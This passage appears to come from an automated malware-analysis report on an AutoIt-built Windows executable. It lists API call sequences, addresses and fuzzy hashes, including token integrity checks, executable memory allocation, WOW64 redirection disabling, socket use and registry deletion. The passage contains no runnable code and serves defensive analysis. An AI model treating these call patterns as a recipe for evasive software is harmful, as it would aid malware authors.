                        • TranslateAcceleratorW.USER32(?,?,?), ref: 009169A9
                        • TranslateMessage.USER32(?), ref: 009169D2
                        • DispatchMessageW.USER32(?), ref: 009169DC
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009169EB
                        Similarity
                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                        • String ID:
                        • API String ID: 2108273632-0
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00918F12
                        • PostMessageW.USER32(?,00000201,00000001), ref: 00918FBC
                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00918FC4
                        • PostMessageW.USER32(?,00000202,00000000), ref: 00918FD2
                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00918FDA
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        APIs
                        • IsWindowVisible.USER32(?), ref: 0091B6C7
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0091B6E4
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0091B71C
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0091B742
                        • _wcsstr.LIBCMT ref: 0091B74C
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                        • String ID:
                        • API String ID: 3902887630-0
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094B44C
                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0094B471
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0094B489
                        • GetSystemMetrics.USER32(00000004), ref: 0094B4B2
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00931184,00000000), ref: 0094B4D0
                        Similarity
                        • API ID: Window$Long$MetricsSystem
                        • String ID:
                        • API String ID: 2294984445-0
                        APIs
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00919802
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00919834
                        • __itow.LIBCMT ref: 0091984C
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00919874
                        • __itow.LIBCMT ref: 00919885
                        Similarity
                        • API ID: MessageSend$__itow$_memmove
                        • String ID:
                        • API String ID: 2983881199-0
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008C134D
                        • SelectObject.GDI32(?,00000000), ref: 008C135C
                        • BeginPath.GDI32(?), ref: 008C1373
                        • SelectObject.GDI32(?,00000000), ref: 008C139C
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        APIs
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00924D5C
                        • __beginthreadex.LIBCMT ref: 00924D7A
                        • MessageBoxW.USER32(?,?,?,?), ref: 00924D8F
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00924DA5
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00924DAC
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                        • String ID:
                        • API String ID: 3824534824-0
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00918766
                        • GetLastError.KERNEL32(?,0091822A,?,?,?), ref: 00918770
                        • GetProcessHeap.KERNEL32(00000008,?,?,0091822A,?,?,?), ref: 0091877F
                        • HeapAlloc.KERNEL32(00000000,?,0091822A,?,?,?), ref: 00918786
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0091879D
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00925502
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00925510
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00925518
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00925522
                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0092555E
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?,?,0091799D), ref: 0091766F
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 0091768A
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 00917698
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?), ref: 009176A8
                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 009176B4
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00918608
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00918612
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00918621
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00918628
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091863E
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 1c2c3cc59c03a545672596fa1d295b16b3945ffaf8c8c9a1ed4331be2f3a6d86
                        • Instruction ID: 7728462a5aefcf5e290c2e741333656db7de9242f4f7626e3db3fe33335754f9
                        • Opcode Fuzzy Hash: 1c2c3cc59c03a545672596fa1d295b16b3945ffaf8c8c9a1ed4331be2f3a6d86
                        • Instruction Fuzzy Hash: F0F06235315209AFEB210FA5DC9DEAB3BACEF8A794B000425F945C6150CB719C81EA60
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00918669
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00918673
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00918682
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00918689
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091869F
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: e73ec5965b4003cca38841329854bcabeefb31410351b6c7293fc618ce887df4
                        • Instruction ID: 11d3edaab6967aa2a3f8917b5d59c30d6c5d0e29209d285f004057373d4ded93
                        • Opcode Fuzzy Hash: e73ec5965b4003cca38841329854bcabeefb31410351b6c7293fc618ce887df4
                        • Instruction Fuzzy Hash: A2F06279314309BFEB211FA5EC98EA73BACEF8A794B100025F945C6150CB71DD41EA60
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 0091C6BA
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0091C6D1
                        • MessageBeep.USER32(00000000), ref: 0091C6E9
                        • KillTimer.USER32(?,0000040A), ref: 0091C705
                        • EndDialog.USER32(?,00000001), ref: 0091C71F
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: b232a1f9d02b07374c209ec5a1166f4a921de1ece6a978f1e123ec715ecd92d2
                        • Instruction ID: 37df081471511a1005a94db7a20be1918e8dacdd72587ee346d5f6547ac486f8
                        • Opcode Fuzzy Hash: b232a1f9d02b07374c209ec5a1166f4a921de1ece6a978f1e123ec715ecd92d2
                        • Instruction Fuzzy Hash: C801A27455470DABEB205B20DD5EFA677B8FF01745F000669F542A14E0DBF4A9949F80
                        APIs
                        • EndPath.GDI32(?), ref: 008C13BF
                        • StrokeAndFillPath.GDI32(?,?,008FBAD8,00000000,?), ref: 008C13DB
                        • SelectObject.GDI32(?,00000000), ref: 008C13EE
                        • DeleteObject.GDI32 ref: 008C1401
                        • StrokePath.GDI32(?), ref: 008C141C
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 2ea129bddd9330d4a1c496e46c985c734471ff18e8429888af534326742541f2
                        • Instruction ID: eb9c6d6c3d6eb3192589c0e864edf840a923e572e51dc4352e005fb1287539c2
                        • Opcode Fuzzy Hash: 2ea129bddd9330d4a1c496e46c985c734471ff18e8429888af534326742541f2
                        • Instruction Fuzzy Hash: 11F01434028249EBDB255F26EC5CB583FB5FB42326F148228E429882F2C7358995EF10
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0092C69D
                        • CoCreateInstance.OLE32(00952D6C,00000000,00000001,00952BDC,?), ref: 0092C6B5
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • CoUninitialize.OLE32 ref: 0092C922
                        Strings
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_memmove
                        • String ID: .lnk
                        • API String ID: 2683427295-24824748
                        • Opcode ID: 5e528283e5f2a9991622f7ea3a8ebd7874b27a3c483232c7cf558fcfcb328e25
                        • Instruction ID: f9d6ddca6eb3d764ff075e11a4eebf2675942c6da0292f8056b404061fc11d32
                        • Opcode Fuzzy Hash: 5e528283e5f2a9991622f7ea3a8ebd7874b27a3c483232c7cf558fcfcb328e25
                        • Instruction Fuzzy Hash: 91A10871108205AFD700EF68C895EABB7B8FF95744F00495CF196D72A2DB70EA49CB52
                        APIs
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 008C7BB1: _memmove.LIBCMT ref: 008C7C0B
                        • __swprintf.LIBCMT ref: 008D302D
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008D2EC6
                        Similarity
                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 1943609520-557222456
                        • Opcode ID: ac3a374c1bbcf631ca0ec64ca513482aed9274378b0f4b58ba974a14acceaf25
                        • Instruction ID: db0924989b27de2ffa531b3c52abe7babc0a57a5c65f784c9fe786f81dceaa5f
                        • Opcode Fuzzy Hash: ac3a374c1bbcf631ca0ec64ca513482aed9274378b0f4b58ba974a14acceaf25
                        • Instruction Fuzzy Hash: 949136711086429FCB18EF28D985D6EB7B8FF85750F00491EF586DB2A1DA70EE44CB52
                        APIs
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                        • CoInitialize.OLE32(00000000), ref: 0092BC26
                        • CoCreateInstance.OLE32(00952D6C,00000000,00000001,00952BDC,?), ref: 0092BC3F
                        • CoUninitialize.OLE32 ref: 0092BC5C
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        Strings
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                        • String ID: .lnk
                        • API String ID: 2126378814-24824748
                        • Opcode ID: ed8b3c67abc5a1a6cfcf95733562790c6043e7d4272ac3ead366609f5ddc3416
                        • Instruction ID: ba6d1114e83dbd22f5da67b8de09196196fc1343b07d3d868e17af9db18334eb
                        • Opcode Fuzzy Hash: ed8b3c67abc5a1a6cfcf95733562790c6043e7d4272ac3ead366609f5ddc3416
                        • Instruction Fuzzy Hash: 4DA122752042159FCB00DF18C484E6ABBF9FF89714F158998F8999B3A1CB31ED45CB92
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 008E52DD
                          • Part of subcall function 008F0340: __87except.LIBCMT ref: 008F037B
                        Strings
                        Similarity
                        • API ID: ErrorHandling__87except__start
                        • String ID: pow
                        • API String ID: 2905807303-2276729525
                        • Opcode ID: 2b7512f18581a52d566d78d152bda5054cda812ce9c73e22eb0380b69df18172
                        • Instruction ID: 8c850badc4ad8c3616eb3aa99ff840ccd6d92da16888bf8647e59884c40aa0a3
                        • Opcode Fuzzy Hash: 2b7512f18581a52d566d78d152bda5054cda812ce9c73e22eb0380b69df18172
                        • Instruction Fuzzy Hash: 7C518B21A1D7499BCB10673AC91137E6790FB1275CF208958E2D5C13E7EE748CC4AE4A
                        Strings
                        Similarity
                        • API ID:
                        • String ID: #$+
                        • API String ID: 0-2552117581
                        • Opcode ID: 9a5bb648f3763926cf8de6d1ec0a15b15ddc2f9aa341000adfa037299c1121a8
                        • Instruction ID: e7393d202e8061a633947effaf2684a5118d27a22d7590fc7705f9e02bd8887b
                        • Opcode Fuzzy Hash: 9a5bb648f3763926cf8de6d1ec0a15b15ddc2f9aa341000adfa037299c1121a8
                        • Instruction Fuzzy Hash: 2D51137920428ACFCF159F29D488AF97BB8FF96310F164059E8919B2E0D7749CC2CB61
                        APIs
                        Strings
                        Similarity
                        • API ID: _memset$_memmove
                        • String ID: ERCP
                        • API String ID: 2532777613-1384759551
                        • Opcode ID: 08a7076c8073e674bde81062752d6c1e38ea00e3ef2bc4fad591ad9c9e710a83
                        • Instruction ID: 2358ab3d904c6de841e7bdeff9152dd47b4f17e0a388b4b39c36e2f5e49c1c0e
                        • Opcode Fuzzy Hash: 08a7076c8073e674bde81062752d6c1e38ea00e3ef2bc4fad591ad9c9e710a83
                        • Instruction Fuzzy Hash: 4651A07190070D9BCB24CF65C8857AABBF5FF04314F20866EE64ACB241F7709694CB45
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0094F910,00000000,?,?,?,?), ref: 00947C4E
                        • GetWindowLongW.USER32 ref: 00947C6B
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00947C7B
                        Strings
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 34c6d485469865dcb6d370ca6d689c41d45734d4575fdf893e317d9beabfc676
                        • Instruction ID: 4a5e80988c87b2b51ce0f401e3c0011778bfe70ac52bc9a2cbc7f3ec3137df57
                        • Opcode Fuzzy Hash: 34c6d485469865dcb6d370ca6d689c41d45734d4575fdf893e317d9beabfc676
                        • Instruction Fuzzy Hash: 3B31B03161420AABDB118F78DC45FEAB7A9FB45324F204729F8B5E22E0C731E8509B50
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009476D0
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009476E4
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00947708
                        Strings
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: 0d9e973260738f20f14e8f85aaf5dd99dc4d90b044a01e0b13ccb0c344d1472c
                        • Instruction ID: 020c8a641be787ad2c3fe7d50075343c696aad76fbf352d331d165c24e8cd1bf
                        • Opcode Fuzzy Hash: 0d9e973260738f20f14e8f85aaf5dd99dc4d90b044a01e0b13ccb0c344d1472c
                        • Instruction Fuzzy Hash: BA21A132514219BBDF15CFA4CC46FEA3B79EF88754F110214FE156B1D0DBB5A8509BA0
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00946FAA
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00946FBA
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00946FDF
                        Strings
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 21d0214117a11086c758e7c62402d52c74e787b58670e0dc29e5e1b37b68f772
                        • Instruction ID: f0f7d7bc413d879deb62003c767996903015ca8d30f9fc0bec4ef014a5498ed3
                        • Opcode Fuzzy Hash: 21d0214117a11086c758e7c62402d52c74e787b58670e0dc29e5e1b37b68f772
                        • Instruction Fuzzy Hash: 2421C272610218BFEF118F54DC85FAB3BBEEF8A754F018164FA449B190C671AC55DBA0
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009479E1
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009479F6
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00947A03
                        Strings
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: 53aacda5eb9b997ceb9d2e36b37b65e1416a4a70ea6043567edc0031ef767b31
                        • Instruction ID: 677d63ab49e0ac52c2e8f5c5de1bd24191ac73bd19649798bbb144dc16e28ba2
                        • Opcode Fuzzy Hash: 53aacda5eb9b997ceb9d2e36b37b65e1416a4a70ea6043567edc0031ef767b31
                        • Instruction Fuzzy Hash: 1011E332254248BAEF149FA4CC05FAB77ADEFC9B68F024519FA45A6090D371D811DB60
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008C4C2E), ref: 008C4CA3
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008C4CB5
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 19418989b65533bc8361a8397166d4bc5ad7dea83ccda63e7ee15e382097f0c1
                        • Instruction ID: da2bff07ec8ea833aa565212393b5eeb7ac57d07c5d50edefb3872c14c69397b
                        • Opcode Fuzzy Hash: 19418989b65533bc8361a8397166d4bc5ad7dea83ccda63e7ee15e382097f0c1
                        • Instruction Fuzzy Hash: 90D01775924723CFD7209F31DA38E0676E5EF0A799B11883E988AD6160E670D8C0CA50
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008C4CE1,?), ref: 008C4DA2
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4DB4
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-1355242751
                        • Opcode ID: 2755cd61e38c1a594df342712fe26a5fa6d1bcaf8b5f1c5bf9c0f2ab9fa0187d
                        • Instruction ID: 290711d1872bd688c1efbc7bd9413e4ab730bad50636bbf728315c77917db31e
                        • Opcode Fuzzy Hash: 2755cd61e38c1a594df342712fe26a5fa6d1bcaf8b5f1c5bf9c0f2ab9fa0187d
                        • Instruction Fuzzy Hash: 9CD0E275A68713CFD720AF71D828E46B6E4EF0A399B11887ED88AD6150E770D880CA50
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008C4D2E,?,008C4F4F,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4D6F
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008C4D81
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-3689287502
                        • Opcode ID: c2d1bf45bb339d19c5cc871c3fed037f16190ddf9ea84337a57981597178cf04
                        • Instruction ID: b60a5107c4766cf6176b811714a501046d78269834d16f8da7b67647dc21b683
                        • Opcode Fuzzy Hash: c2d1bf45bb339d19c5cc871c3fed037f16190ddf9ea84337a57981597178cf04
                        • Instruction Fuzzy Hash: 22D01275514713CFD7205F71D828F1676E8FF16355B11C97D9887D6650E670D4C0CA50
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll,?,009412C1), ref: 00941080
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00941092
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: eea20a09745a599ba1d573e091da60f8c3849707796055119c3a238992f690ce
                        • Instruction ID: ac614f90777f79ffcc0a7d6a8ee4065c6b4daa7462a6b4ba2437927e3a6dd047
                        • Opcode Fuzzy Hash: eea20a09745a599ba1d573e091da60f8c3849707796055119c3a238992f690ce
                        • Instruction Fuzzy Hash: 81D01775924713CFD7209F35D828E5A76E8AF5A365F11CD3AA49ADA150EB70C8C0CA50
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00939009,?,0094F910), ref: 00939403
                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00939415
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetModuleHandleExW$kernel32.dll
                        • API String ID: 2574300362-199464113
                        • Opcode ID: 54e012d0bbff00354ddb5ab62f12d17c04bcea8a864be6f1b5032d65ff2da2b5
                        • Instruction ID: b36dddb3fee25145138d04c4af0fb6d3c5c87f4247849909b581b83161b23aa5
                        • Opcode Fuzzy Hash: 54e012d0bbff00354ddb5ab62f12d17c04bcea8a864be6f1b5032d65ff2da2b5
                        • Instruction Fuzzy Hash: EDD01275518723DFD7205F31DA1CA0776D9AF46355F15C8399485D6560E6B0C480DA50
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9a626bdef1d65a58f92ada642c49b1afb9bec4050c0f2ec1efd2c58024f34f6
                        • Instruction ID: 41351f53f015e8d5cf9270159f5602490501e778711be471a286d95d2bba8564
                        • Opcode Fuzzy Hash: d9a626bdef1d65a58f92ada642c49b1afb9bec4050c0f2ec1efd2c58024f34f6
                        • Instruction Fuzzy Hash: B4C12A75B0421AEFDB14CF94C884AAEF7B9FF48714B258599E805EB251D730EE81CB90
                        APIs
                        • CharLowerBuffW.USER32(?,?), ref: 0093E3D2
                        • CharLowerBuffW.USER32(?,?), ref: 0093E415
                          • Part of subcall function 0093DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0093DAD9
                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0093E615
                        • _memmove.LIBCMT ref: 0093E628
                        Similarity
                        • API ID: BuffCharLower$AllocVirtual_memmove
                        • String ID:
                        • API String ID: 3659485706-0
                        • Opcode ID: 6b84a78992979654ed7a3b8ca5dae71e0a4ab384039b8a0e0bcbb2cac1cd3765
                        • Instruction ID: a67570e382384fd428e9c54c35691e6cba7aef4cd7e94fa055f87b28784aae0d
                        • Opcode Fuzzy Hash: 6b84a78992979654ed7a3b8ca5dae71e0a4ab384039b8a0e0bcbb2cac1cd3765
                        • Instruction Fuzzy Hash: 17C124716083518FCB14DF28C480A6ABBE4FF89718F14896DF8999B391D771E946CF82
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 009383D8
                        • CoUninitialize.OLE32 ref: 009383E3
                          • Part of subcall function 0091DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0091DAC5
                        • VariantInit.OLEAUT32(?), ref: 009383EE
                        • VariantClear.OLEAUT32(?), ref: 009386BF
                        Similarity
                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 780911581-0
                        • Opcode ID: 839c34aba0dcb1e8fb13ad366c3e8e37060c7c6bd309595023703dd7cc32e8a7
                        • Instruction ID: e521a9cb35ff7920675b640bccaba6b83e499b72f2dd33434031907935ef8358
                        • Opcode Fuzzy Hash: 839c34aba0dcb1e8fb13ad366c3e8e37060c7c6bd309595023703dd7cc32e8a7
                        • Instruction Fuzzy Hash: 54A102752047119FCB10DF19C885B2ABBE5BF88714F15488CF99A9B3A2CB34ED04CB82
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00952C7C,?), ref: 00917C32
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00952C7C,?), ref: 00917C4A
                        • CLSIDFromProgID.OLE32(?,?,00000000,0094FB80,000000FF,?,00000000,00000800,00000000,?,00952C7C,?), ref: 00917C6F
                        • _memcmp.LIBCMT ref: 00917C90
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: 0750304d95f02c164e92121d51b3a3473f3f8f6302305f22b55fa44b2cf77846
                        • Instruction ID: c4ee05721dde9642533f335575ba598d9b77cf47d5ca6caed7186a4bb2296eab
                        • Opcode Fuzzy Hash: 0750304d95f02c164e92121d51b3a3473f3f8f6302305f22b55fa44b2cf77846
                        • Instruction Fuzzy Hash: 21812A75A0410AEFCB04DFD4C984EEEB7B9FF89315F204598E506AB250DB71AE45CB60
                        APIs
                        Similarity
                        • API ID: Variant$AllocClearCopyInitString
                        • String ID:
                        • API String ID: 2808897238-0
                        • Opcode ID: 78be3d9894e93bff7107fbb727a879f42aa0249c101e47e72df34ef93b489a45
                        • Instruction ID: 3eb85402f2816741bd484149fbdde31d9c1d51286bf87aa416fa2e74075c17b2
                        • Opcode Fuzzy Hash: 78be3d9894e93bff7107fbb727a879f42aa0249c101e47e72df34ef93b489a45
                        • Instruction Fuzzy Hash: ED51963470830A9ADB24AFA9D495BA9F3F9EF49310F208C1FE596C7291DE74D8C19B11
                        APIs
                        • GetWindowRect.USER32(00FFE640,?), ref: 00949AD2
                        • ScreenToClient.USER32(00000002,00000002), ref: 00949B05
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00949B72
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 121a5264e864878de8a142f874e9f50cd9a2100c6fb7bddb9e1c4f603323bc5b
                        • Instruction ID: 6aac0b5377df4a718bcadca7decaf84b00ee187227fda9594844a6e00b184b95
                        • Opcode Fuzzy Hash: 121a5264e864878de8a142f874e9f50cd9a2100c6fb7bddb9e1c4f603323bc5b
                        • Instruction Fuzzy Hash: 4A511C34A00209EFDF14DF68E981EAE7BB9FF55360F148269F8159B290D730AD41DB90
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00936CE4
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936CF4
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00936D58
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936D64
                        Similarity
                        • API ID: ErrorLast$__itow__swprintfsocket
                        • String ID:
                        • API String ID: 2214342067-0
                        • Opcode ID: 4575cad1ae773118140e7903d811a89288d29ae2e6bf668a448edd29fbc5776a
                        • Instruction ID: 9b043c6e760f80d3148dc0569fff53de414680c8cfc642f88b66e07046aa4169
                        • Opcode Fuzzy Hash: 4575cad1ae773118140e7903d811a89288d29ae2e6bf668a448edd29fbc5776a
                        • Instruction Fuzzy Hash: 3D419275740210AFEB10AF28DC8AF6A77B9EB44B10F44C45CFA59DB2D2DA749C008B92
                        APIs
                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0094F910), ref: 009367BA
                        • _strlen.LIBCMT ref: 009367EC
                        Similarity
                        • API ID: _strlen
                        • String ID:
                        • API String ID: 4218353326-0
                        • Opcode ID: 7b1c738c790340d7e8cfdc0bde9abcfee31a9238f6b805d56ff248a681f2f8e5
                        • Instruction ID: 787905d38092fe20e83427888ddb397fc56a5ddc21fa1c068afe97d1a74038ea
                        • Opcode Fuzzy Hash: 7b1c738c790340d7e8cfdc0bde9abcfee31a9238f6b805d56ff248a681f2f8e5
                        • Instruction Fuzzy Hash: 6041AF35A00204ABCB14EBA8DCD5FAEB7B9EF48314F148169F9169B292DF30ED40CB51
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0092BB09
                        • GetLastError.KERNEL32(?,00000000), ref: 0092BB2F
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0092BB54
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0092BB80
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 2eb17f68df266c04d15a924cde705886def0fddc247fb1e8da21eed1bca596b8
                        • Instruction ID: 08f8cd2d6142067df7eec0041539534d896e978182d32aa5e63620ad1f12afcf
                        • Opcode Fuzzy Hash: 2eb17f68df266c04d15a924cde705886def0fddc247fb1e8da21eed1bca596b8
